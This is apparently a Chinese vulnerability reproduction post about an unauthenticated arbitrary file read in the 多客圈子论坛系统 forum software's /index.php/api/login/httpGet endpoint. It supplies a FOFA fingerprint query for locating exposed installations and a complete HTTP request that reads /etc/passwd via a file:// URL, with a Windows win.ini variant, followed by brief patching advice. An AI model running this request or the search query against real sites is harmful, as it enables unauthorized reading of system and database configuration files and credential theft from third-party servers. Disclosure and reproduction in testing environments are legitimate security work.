多客圈子论坛系统 httpGet 任意文件读取漏洞复现

0x01 产品简介

多客圈子论坛系统是一种面向特定人群或特定话题的社交网络,它提供了用户之间交流、分享、讨论的平台。在这个系统中,用户可以创建、加入不同的圈子,圈子可以是基于兴趣、地域、职业等不同主题的。用户可以在圈子中发帖、评论、点赞等互动。社交圈子论坛系统除了提供基本的社交功能外,还可以根据用户行为和兴趣为用户推荐相关内容。

0x02 漏洞概述

多客圈子论坛系统 /index.php/api/login/httpGet 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:body="/static/index/js/jweixin-1.2.0.js"

0x04 漏洞复现

PoC

复制代码
GET /index.php/api/login/httpGet?url=file:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

PS:Windows读取C:/windows/win.ini

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

目前软件已发布安全修复更新,受影响用户可以联系厂商获取补丁。

相关推荐
newxtc3 小时前
【JJ斗地主-注册安全分析报告】
开发语言·javascript·人工智能·安全
毒果6 小时前
网络安全全景解析
安全·web安全
云盾安全防护6 小时前
CC攻击与WAF的对抗战
网络·安全·ddos
网硕互联的小客服8 小时前
如何在服务器上部署 Python Django 应用
linux·运维·服务器·网络·安全
渗透好难8 小时前
CTF show 数学不及格
安全·系统安全·密码学
百度安全9 小时前
BCS 2025|百度副总裁陈洋:智能体在安全领域的应用实践
安全·百度
像素工坊可视化10 小时前
监控升级:可视化如何让每一个细节 “说话”
运维·人工智能·安全
程序员阿超的博客10 小时前
【安全篇】金刚不坏之身:整合 Spring Security + JWT 实现无状态认证与授权
java·spring boot·安全·spring
好想打kuo碎10 小时前
轻量安全的密码管理工具Vaultwarden
linux·安全·ubuntu
windy1a13 小时前
【c语言】安全完整性等级
安全